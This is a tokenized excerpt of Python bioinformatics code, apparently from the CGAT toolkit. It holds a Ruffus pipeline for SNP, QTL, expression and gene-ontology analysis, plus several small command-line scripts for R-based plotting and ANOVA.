"<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % track ) <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> cc . execute ( statement ) <EOL> for contig , pos in cc : <EOL> outf . write ( "<STR_LIT>" % ( contig , pos , pos + <NUM_LIT:1> ) ) <EOL> outf . close ( ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) , loadPolyphen , loadPolyphenMap ) <EOL> @ transform ( "<STR_LIT>" , <EOL> regex ( "<STR_LIT>" ) , <EOL> r"<STR_LIT>" ) <EOL> def buildBenignSNPs ( infile , outfile ) : <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> outf = gzip . open ( outfile , "<STR_LIT:w>" ) <EOL> outf . 
write ( "<STR_LIT>" % track ) <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> cc . execute ( statement ) <EOL> for contig , pos in cc : <EOL> outf . write ( "<STR_LIT>" % ( contig , pos , pos + <NUM_LIT:1> ) ) <EOL> outf . close ( ) <EOL> @ merge ( ( buildBenignSNPs , buildDeleteriousSNPs ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , ) , <EOL> ) <EOL> def mergeSNPs ( infiles , outfiles ) : <EOL> tmp1 = P . getTempFilename ( ) <EOL> tmp2 = P . getTempFilename ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> os . unlink ( tmp1 ) <EOL> os . unlink ( tmp2 ) <EOL> @ merge ( ( buildBenignSNPs , buildDeleteriousSNPs ) , <EOL> "<STR_LIT>" ) <EOL> def buildSNPDensityIsochores ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ merge ( [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , "<STR_LIT>" ) <EOL> def QTLSummary ( infiles , outfile ) : <EOL> for infile in infiles : <EOL> basename = os . path . basename ( infile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ follows ( buildQTLWorkspaces ) <EOL> @ merge ( ( buildDeleteriousSNPs , buildBenignSNPs , mergeSNPs ) , "<STR_LIT>" ) <EOL> def runGATOnQTLs ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> segments = IOTools . flatten ( infiles ) <EOL> workspaces = [ "<STR_LIT>" , ] <EOL> annotations = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> workspaces = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % x for x in workspaces ] ) <EOL> annotations = "<STR_LIT:U+0020>" . 
join ( [ "<STR_LIT>" % x for x in annotations ] ) <EOL> segments = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % x for x in segments ] ) <EOL> to_cluster = True <EOL> job_options = "<STR_LIT>" <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ follows ( buildQTLWorkspaces ) <EOL> @ merge ( mergeSNPs , "<STR_LIT>" ) <EOL> def runGATOnQTLsSmall ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> segments = IOTools . flatten ( infiles ) <EOL> workspaces = [ "<STR_LIT>" , ] <EOL> annotations = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> workspaces = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % x for x in workspaces ] ) <EOL> annotations = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % x for x in annotations ] ) <EOL> segments = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % x for x in segments ] ) <EOL> to_cluster = True <EOL> job_options = "<STR_LIT>" <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( ( runGATOnQTLs , ) , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadGATOnQTLs ( infile , outfile ) : <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> stat_files = glob . glob ( "<STR_LIT>" ) <EOL> for stat_file in stat_files : <EOL> basename = os . path . basename ( stat_file ) <EOL> table = os . path . splitext ( basename ) [ <NUM_LIT:0> ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> def correlateExpressionAndNMD ( infiles , outfile , join_field = "<STR_LIT>" ) : <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> columns = Database . getColumnNames ( dbhandle , "<STR_LIT>" ) <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % ( join_field , Stats . Summary ( ) . getHeader ( ) ) ) <EOL> knockouts = set ( ) <EOL> expressed = set ( ) <EOL> for infile in infiles : <EOL> table = P . toTable ( infile ) <EOL> if table . endswith ( "<STR_LIT>" ) : <EOL> track = table [ : - len ( "<STR_LIT>" ) ] <EOL> elif table . 
endswith ( "<STR_LIT>" ) : <EOL> track = table [ : - len ( "<STR_LIT>" ) ] <EOL> cols = [ x for x in columns if re . search ( track , x ) ] <EOL> if len ( cols ) == <NUM_LIT:0> : <EOL> E . warn ( "<STR_LIT>" % track ) <EOL> continue <EOL> where = "<STR_LIT>" . join ( [ "<STR_LIT>" % x for x in cols ] ) <EOL> fields = "<STR_LIT:U+002C>" . join ( cols ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> result = set ( list ( Database . executewait ( dbhandle , statement ) ) ) <EOL> knockouts . update ( result ) <EOL> nknockouts = len ( result ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> result = list ( Database . executewait ( dbhandle , statement ) ) <EOL> nexpressed = len ( result ) <EOL> E . info ( "<STR_LIT>" % ( track , nknockouts , nexpressed ) ) <EOL> expressed . update ( set ( [ x [ <NUM_LIT:0> ] for x in result ] ) ) <EOL> for gene_id , grouper in itertools . groupby ( result , key = lambda x : x [ <NUM_LIT:0> ] ) : <EOL> gg = list ( grouper ) <EOL> s = [ item for sublist in gg for item in sublist [ <NUM_LIT:1> : ] ] <EOL> outf . write ( "<STR_LIT:\t>" . join ( ( track , gene_id , str ( Stats . Summary ( s ) ) ) ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> E . info ( "<STR_LIT>" % ( len ( knockouts ) , len ( expressed ) ) ) <EOL> @ follows ( loadExpressionData ) <EOL> @ merge ( summarizeAllelesPerTranscript , "<STR_LIT>" ) <EOL> def correlateExpressionAndNMDByTranscript ( infiles , outfile ) : <EOL> correlateExpressionAndNMD ( infiles , outfile , join_field = "<STR_LIT>" ) <EOL> @ follows ( loadExpressionData ) <EOL> @ merge ( summarizeAllelesPerGene , "<STR_LIT>" ) <EOL> def correlateExpressionAndNMDByGene ( infiles , outfile ) : <EOL> correlateExpressionAndNMD ( infiles , outfile , join_field = "<STR_LIT>" ) <EOL> @ transform ( ( correlateExpressionAndNMDByTranscript , correlateExpressionAndNMDByGene ) , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def loadNMDSanity ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . 
toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( importSVs , suffix ( "<STR_LIT>" ) , <EOL> add_inputs ( buildTranscripts ) , <EOL> "<STR_LIT>" ) <EOL> def countOverlapBetweenSVsandTranscripts ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> infile , transcripts = infiles <EOL> patterns = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:all>" , "<STR_LIT>" ) , ) <EOL> for suffix , tst in patterns : <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( countOverlapBetweenSVsandTranscripts , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def loadSVOverlap ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> for pattern in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:all>" ) : <EOL> tt = table + "<STR_LIT>" % pattern <EOL> suffix = "<STR_LIT>" % pattern <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( loadSVOverlap , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def summarizeSVsPerGene ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> tablename = outfile [ : - len ( "<STR_LIT>" ) ] <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> patterns = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:all>" ) <EOL> tables = [ "<STR_LIT>" % ( track , pattern , x ) for x , pattern in enumerate ( patterns ) ] <EOL> sqltables = "<STR_LIT:U+002C>" . join ( tables ) <EOL> sqlcount = [ "<STR_LIT>" % ( x , pattern ) for x , pattern in enumerate ( patterns ) ] <EOL> sqlcount = "<STR_LIT:U+002CU+0020>" . join ( sqlcount ) <EOL> sqldummy = [ "<STR_LIT>" % pattern for pattern in patterns ] <EOL> sqldummy = "<STR_LIT:U+002CU+0020>" . join ( sqldummy ) <EOL> sqlwhere = [ "<STR_LIT>" % x for x , pattern in enumerate ( patterns ) ] <EOL> sqlwhere = "<STR_LIT>" . 
join ( sqlwhere ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> Database . executewait ( dbhandle , statement ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" % locals ( ) ) <EOL> for pattern in patterns : <EOL> Database . executewait ( dbhandle , <EOL> "<STR_LIT>" % locals ( ) ) <EOL> dbhandle . commit ( ) <EOL> P . touch ( outfile ) <EOL> @ files ( [ ( None , "<STR_LIT>" ) , ] ) <EOL> def createGO ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGO . createGO ( infile , outfile ) <EOL> @ files_re ( createGO , "<STR_LIT>" , r"<STR_LIT>" ) <EOL> def createGOSlim ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> PGO . createGOSlim ( infile , outfile ) <EOL> @ transform ( ( createGO , createGOSlim ) , regex ( r"<STR_LIT>" ) , <EOL> r"<STR_LIT>" ) <EOL> def loadGOAssignments ( infile , outfile ) : <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( importMGI , "<STR_LIT>" ) , ) ) <EOL> def createMGI ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> statement = '''<STR_LIT>''' <EOL> cc = dbhandle . cursor ( ) <EOL> data = cc . execute ( statement ) . fetchall ( ) <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT:\n>" . join ( [ "<STR_LIT:\t>" . join ( x ) for x in data ] ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> def buildGeneMatrix ( tracks , analysis , statement , outfile ) : <EOL> '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> all_genes = [ x [ <NUM_LIT:0> ] for x in cc . execute ( '''<STR_LIT>''' % locals ( ) ) ] <EOL> gene2row = dict ( [ ( x [ <NUM_LIT:1> ] , x [ <NUM_LIT:0> ] ) for x in enumerate ( all_genes ) ] ) <EOL> matrix = numpy . zeros ( ( len ( all_genes ) , len ( analysis ) * len ( tracks ) ) , numpy . 
int ) <EOL> col = <NUM_LIT:0> <EOL> for track in tracks : <EOL> for label , field_where in analysis : <EOL> genes = [ x [ <NUM_LIT:0> ] for x in cc . execute ( statement % locals ( ) ) ] <EOL> for gene_id in genes : <EOL> matrix [ gene2row [ gene_id ] ] [ col ] = <NUM_LIT:1> <EOL> col += <NUM_LIT:1> <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( "<STR_LIT>" % ( x , y [ <NUM_LIT:0> ] ) for x , y in itertools . product ( tracks , analysis ) ) ) <EOL> for gene_id in all_genes : <EOL> outf . write ( "<STR_LIT>" % ( gene_id , "<STR_LIT:\t>" . join ( map ( str , matrix [ gene2row [ gene_id ] ] ) ) ) ) <EOL> outf . close ( ) <EOL> @ merge ( summarizeAllelesPerGene , "<STR_LIT>" ) <EOL> def buildGeneMatrixEffects ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> analysis = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> tracks = [ x [ : - len ( "<STR_LIT>" ) ] for x in infiles ] <EOL> statement = '''<STR_LIT>''' <EOL> buildGeneMatrix ( tracks , analysis , statement , outfile ) <EOL> @ merge ( summarizeAllelesPerGene , "<STR_LIT>" ) <EOL> def buildGeneMatrixAlleles ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> analysis = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> tracks = [ x [ : - len ( "<STR_LIT>" ) ] for x in infiles ] <EOL> statement = '''<STR_LIT>''' <EOL> buildGeneMatrix ( tracks , analysis , statement , outfile ) <EOL> @ merge ( summarizeEffectsPerGene , "<STR_LIT>" ) <EOL> def buildGeneMatrixConsequences ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> analysis = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> tracks = [ x [ : - len ( "<STR_LIT>" ) ] for x in infiles ] <EOL> statement = '''<STR_LIT>''' <EOL> 
buildGeneMatrix ( tracks , analysis , statement , outfile ) <EOL> @ merge ( summarizeSVsPerGene , "<STR_LIT>" ) <EOL> def buildGeneMatrixStructuralVariants ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> analysis = ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> tracks = [ x [ : - len ( "<STR_LIT>" ) ] for x in infiles ] <EOL> statement = '''<STR_LIT>''' <EOL> buildGeneMatrix ( tracks , analysis , statement , outfile ) <EOL> @ follows ( buildGeneMatrixConsequences , <EOL> buildGeneMatrixAlleles , <EOL> buildGeneMatrixEffects , <EOL> buildGeneMatrixStructuralVariants ) <EOL> @ files ( [ ( ( x , y ) , "<STR_LIT>" % ( re . sub ( "<STR_LIT>" , "<STR_LIT>" , x ) , re . sub ( "<STR_LIT>" , "<STR_LIT>" , y ) ) ) for x , y in itertools . product ( glob . glob ( "<STR_LIT>" ) , <EOL> glob . glob ( "<STR_LIT>" ) ) <EOL> if not y . endswith ( "<STR_LIT>" ) ] ) <EOL> def runGeneListAnalysis ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> genematrix , assignments = infiles <EOL> to_cluster = True <EOL> try : <EOL> options = "<STR_LIT>" % PARAMS <EOL> except TypeError : <EOL> options = "<STR_LIT>" <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( runGeneListAnalysis , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadGeneListAnalysis ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . 
run ( ) <EOL> @ follows ( loadTranscripts , <EOL> loadTranscriptInformation , <EOL> loadGeneStats , <EOL> loadGeneInformation , <EOL> loadHumanOrthologs , <EOL> loadGene2Omim , <EOL> createGO , <EOL> createGOSlim , <EOL> createMGI ) <EOL> def prepare ( ) : <EOL> pass <EOL> @ follows ( makeEffects , loadEffects , summarizeEffectsPerGene ) <EOL> def consequences ( ) : pass <EOL> @ follows ( buildAlleles , loadAlleles , <EOL> summarizeAllelesPerTranscript , <EOL> summarizeAllelesPerGene , <EOL> combineSummaryAllelesPerGene ) <EOL> def alleles ( ) : pass <EOL> @ follows ( loadPolyphen , loadPolyphenMap , loadPanther ) <EOL> def effects ( ) : pass <EOL> @ follows ( loadAnnotations , loadAnnotationsSummary ) <EOL> def annotations ( ) : pass <EOL> @ follows ( prepare , consequences , effects , alleles , annotations ) <EOL> def full ( ) : pass <EOL> @ follows ( buildQTLWorkspaces , <EOL> runGATOnQTLs , <EOL> runGATOnQTLsSmall ) <EOL> def qtl ( ) : pass <EOL> @ follows ( importSVs , <EOL> countOverlapBetweenSVsandTranscripts , <EOL> loadSVOverlap ) <EOL> def svs ( ) : pass <EOL> @ follows ( buildGeneMatrixConsequences , <EOL> buildGeneMatrixAlleles , <EOL> buildGeneMatrixEffects , <EOL> runGeneListAnalysis , <EOL> loadGeneListAnalysis , <EOL> loadGOAssignments , <EOL> ) <EOL> def go ( ) : pass <EOL> @ follows ( loadExpressionData , <EOL> correlateExpressionAndNMDByTranscript , <EOL> correlateExpressionAndNMDByGene , <EOL> loadExpressionPerGene , <EOL> loadNMDSanity ) <EOL> def expression ( ) : pass <EOL> @ follows ( loadSNPValidationData , <EOL> buildSNPBlacklist , <EOL> recallGenomicSNPs ) <EOL> def validation ( ) : pass <EOL> @ files ( [ ( None , "<STR_LIT>" ) , ] ) <EOL> def clone ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> src_dir , level = sys . argv [ - <NUM_LIT:2> : ] <EOL> if not os . path . exists ( src_dir ) : <EOL> raise IOError ( "<STR_LIT>" % src_dir ) <EOL> if not os . path . exists ( os . path . 
join ( src_dir , "<STR_LIT>" ) ) : <EOL> raise IOError ( "<STR_LIT>" % src_dir ) <EOL> if level in ( "<STR_LIT:data>" , ) : <EOL> P . execute ( "<STR_LIT>" ) <EOL> P . execute ( "<STR_LIT>" ) <EOL> @ merge ( ( alleles , prepare ) , "<STR_LIT>" ) <EOL> def createViewGenes ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> Database . executewait ( dbhandle , "<STR_LIT>" ) <EOL> knockouts = "<STR_LIT:U+002C>" . join ( [ "<STR_LIT>" % ( track , track ) for track in TRACKS ] ) <EOL> statement = '''<STR_LIT>''' <EOL> Database . executewait ( dbhandle , statement % locals ( ) ) <EOL> @ follows ( createViewGenes ) <EOL> def views ( ) : <EOL> pass <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( P . main ( sys . argv ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import CGAT . Experiment as E <EOL> from rpy2 . robjects import r as R <EOL> def main ( argv = None ) : <EOL> """<STR_LIT>""" <EOL> if not argv : <EOL> argv = sys . argv <EOL> parser = E . OptionParser ( version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT:width>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT:-c>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , choices = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> type = "<STR_LIT:string>" , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:float>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:float>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . set_defaults ( <EOL> height = <NUM_LIT> , width = <NUM_LIT> , number = <NUM_LIT:5> , colour = "<STR_LIT>" , margins = "<STR_LIT>" , cex_names = <NUM_LIT:1> , cex_axis = <NUM_LIT:1> ) <EOL> ( options , args ) = E . Start ( parser , argv = argv ) <EOL> if options . 
number > <NUM_LIT:20> : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> inf = options . infile <EOL> outf = options . outfile <EOL> R ( '''<STR_LIT>''' % <EOL> inf ) <EOL> R ( '''<STR_LIT>''' % <EOL> ( outf , options . height , options . width ) ) <EOL> R ( '''<STR_LIT>''' % options . number ) <EOL> R ( '''<STR_LIT>''' % options . margins ) <EOL> if options . side : <EOL> horiz = "<STR_LIT>" <EOL> else : <EOL> horiz = "<STR_LIT>" <EOL> R ( '''<STR_LIT>''' % ( options . number , options . colour , horiz , options . cex_names , options . cex_axis ) ) <EOL> R [ "<STR_LIT>" ] ( ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import CGAT . Experiment as E <EOL> def main ( argv = None ) : <EOL> """<STR_LIT>""" <EOL> if argv is None : <EOL> argv = sys . argv <EOL> parser = E . OptionParser ( version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT:test>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> ( options , args ) = E . Start ( parser , argv = argv ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import CGAT . Experiment as E <EOL> import CGAT . IOTools as IOTools <EOL> from rpy2 . robjects import r as R <EOL> def main ( argv = None ) : <EOL> """<STR_LIT>""" <EOL> if argv is None : <EOL> argv = sys . argv <EOL> parser = E . OptionParser ( <EOL> version = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT:-c>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> choices = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . set_defaults ( <EOL> columns = "<STR_LIT:all>" , <EOL> filename_tree = None , <EOL> add_header = True , <EOL> write_header = False , <EOL> debug = False , <EOL> methods = [ ] , <EOL> value_format = "<STR_LIT>" , <EOL> pvalue_format = "<STR_LIT>" , <EOL> display_tree = False , <EOL> ) <EOL> ( options , args ) = E . Start ( parser , quiet = True ) <EOL> if options . columns not in ( "<STR_LIT:all>" , "<STR_LIT>" ) : <EOL> options . columns = map ( lambda x : int ( x ) - <NUM_LIT:1> , options . columns . split ( "<STR_LIT:U+002C>" ) ) <EOL> data = [ ] <EOL> options . filenames = args <EOL> for filename in options . 
filenames : <EOL> infile = open ( filename , "<STR_LIT:r>" ) <EOL> table , headers = IOTools . readTable ( <EOL> infile , take = options . columns , headers = False ) <EOL> infile . close ( ) <EOL> data . append ( table ) <EOL> fields = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> options . stdout . write ( "<STR_LIT>" ) <EOL> for field in fields : <EOL> options . stdout . write ( "<STR_LIT>" % field ) <EOL> options . stdout . write ( "<STR_LIT:\n>" ) <EOL> for x in range ( len ( data ) ) : <EOL> for y in range ( x + <NUM_LIT:1> , len ( data ) ) : <EOL> rpy . set_default_mode ( rpy . NO_CONVERSION ) <EOL> factors = [ "<STR_LIT:x>" ] * len ( data [ x ] [ : , <NUM_LIT:0> ] ) + [ "<STR_LIT:y>" ] * len ( data [ y ] [ : , <NUM_LIT:0> ] ) <EOL> values = list ( data [ x ] [ : , <NUM_LIT:0> ] ) + list ( data [ y ] [ : , <NUM_LIT:0> ] ) <EOL> linear_model = R . lm ( <EOL> R ( "<STR_LIT>" ) , data = R . data_frame ( x = factors , y = values ) ) <EOL> rpy . set_default_mode ( rpy . BASIC_CONVERSION ) <EOL> result = R . anova ( linear_model ) <EOL> options . stdout . write ( <EOL> "<STR_LIT>" % ( options . filenames [ x ] , options . filenames [ y ] ) ) <EOL> for field in fields : <EOL> options . stdout . write ( "<STR_LIT>" % str ( result [ field ] ) ) <EOL> options . stdout . write ( "<STR_LIT:\n>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import re <EOL> import math <EOL> import CGAT . Experiment as E <EOL> import CGAT . Genomics as Genomics <EOL> import CGAT . IOTools as IOTools <EOL> import CGAT . SequenceProperties as SequenceProperties <EOL> import CGAT . FastaIterator as FastaIterator <EOL> def main ( argv = None ) : <EOL> parser = E . OptionParser ( version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> choices = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT>" , <EOL> choices = ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . set_defaults ( <EOL> filename_weights = None , <EOL> pseudocounts = 